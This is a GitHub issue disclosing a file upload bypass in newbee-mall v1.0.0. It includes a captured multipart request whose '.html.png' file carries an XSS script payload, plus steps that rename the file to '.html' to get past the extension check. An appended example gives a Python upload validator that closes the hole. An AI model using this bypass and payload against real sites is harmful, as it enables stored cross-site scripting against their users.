A file upload vulnerability exists in newbee-mall #63

Closed
afeng2016-s opened this issue Mar 3, 2022 · 0 comments
afeng2016-s commented Mar 3, 2022

[Suggested description]
A file upload vulnerability exists in NewBee mall, because the upload restriction in the upload method of uploadcontroller can be bypassed by modifying the file format suffix.

[Vulnerability Type]
File upload vulnerability

[Vendor of Product]
https://github.com/newbee-ltd/newbee-mall

[Affected Product Code Base]
v1.0.0

[Affected Component]
POST /admin/upload/file HTTP/1.1
Host: localhost:28089
Content-Length: 671
Cache-Control: max-age=0
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: http://localhost:28089/
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoXATzrr6JWhnTx5Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: iframe
Referer: http://localhost:28089/admin/goods/edit/10907
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: locale=zh-cn; Hm_lvt_a4980171086658b20eb2d9b523ae1b7b=1645520663,1645696647; JSESSIONID=11D044F12F07C3F2772AC7EE836610E2
Connection: close

------WebKitFormBoundaryoXATzrr6JWhnTx5Q
Content-Disposition: form-data; name="file"; filename="1.html.png"
Content-Type: image/png

<script type="text/javascript" src="http://www.qq.com/404/search_children.js" charset="utf-8" homePageUrl="{{domain}}" homePageName="{{siteName}}"></script>
        <script>alert("xss")</script>
    </div>
</div>
------WebKitFormBoundaryoXATzrr6JWhnTx5Q--

[Impact Code execution]
true

[Vulnerability proof]
1. Access the address http://localhost:28089/admin/goods, select a commodity's information to modify, and enter the file upload page.
[image]
2. Open the burpsuite packet-capturing agent and click to upload pictures.
[image]
3. By default, the system only supports JPG, PNG and GIF files. We can bypass this by modifying the file suffix.
[image]
4. Modify the value of filename to 1.html
[image]
Get the access path of the uploaded file
[image]
Complete the data update
[image]
5. Access the uploaded file path, and the vulnerability reproduction is complete.
[image]

[Defective code]
[image]
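The kind of check that closes this class of bug, as an added example that is not part of the issue or of newbee-mall's own code: the extension is taken only from the final suffix of the sanitised filename, must be on an allowlist, the file's leading bytes must match that type, and the stored name is generated server-side. Python is used here for a self-contained demonstration; the same checks apply to the project's Spring MultipartFile handler. The MAGIC table and the sample payloads are constructed for this example.

```python
import secrets

# Allowlisted extensions and the magic bytes each must start with (constructed
# for this example; the report says the project allowed JPG, PNG and GIF).
MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}

class UploadRejected(ValueError):
    """Raised when an upload fails validation."""

def validate_upload(client_filename: str, data: bytes) -> str:
    """Return a server-generated storage name, or raise UploadRejected.

    The client-sent Content-Type header is ignored: the extension comes only
    from the LAST suffix of the sanitised filename, must be allowlisted, and
    the file's leading bytes must match that type.
    """
    # Drop any directory component the client may have sent.
    base = client_filename.replace("\\", "/").rsplit("/", 1)[-1]
    if not base or base.startswith("."):
        raise UploadRejected("missing or hidden filename")
    # '1.html.png' -> 'png'; '1.html' -> 'html'; 'x.png.html' -> 'html'.
    _, dot, ext = base.rpartition(".")
    ext = ext.lower()
    if not dot or ext not in MAGIC:
        raise UploadRejected(f"extension {ext!r} not allowed")
    if not any(data.startswith(sig) for sig in MAGIC[ext]):
        raise UploadRejected(f"content does not start like a {ext} file")
    # Random name: attacker-chosen names never reach the filesystem or URL space.
    return f"{secrets.token_hex(16)}.{ext}"

def is_accepted(client_filename: str, data: bytes) -> bool:
    """Yes/no wrapper around validate_upload."""
    try:
        validate_upload(client_filename, data)
        return True
    except UploadRejected:
        return False

# Constructed samples: a minimal PNG header, and HTML like the report's payload.
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 8
HTML_SAMPLE = b'<script>alert("xss")</script>'
```

Serve the stored files with a Content-Type derived from the validated extension and with `X-Content-Type-Options: nosniff`, so a browser never reinterprets an uploaded image as HTML.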

ZHENFENG13 added a commit that referenced this issue Nov 3, 2022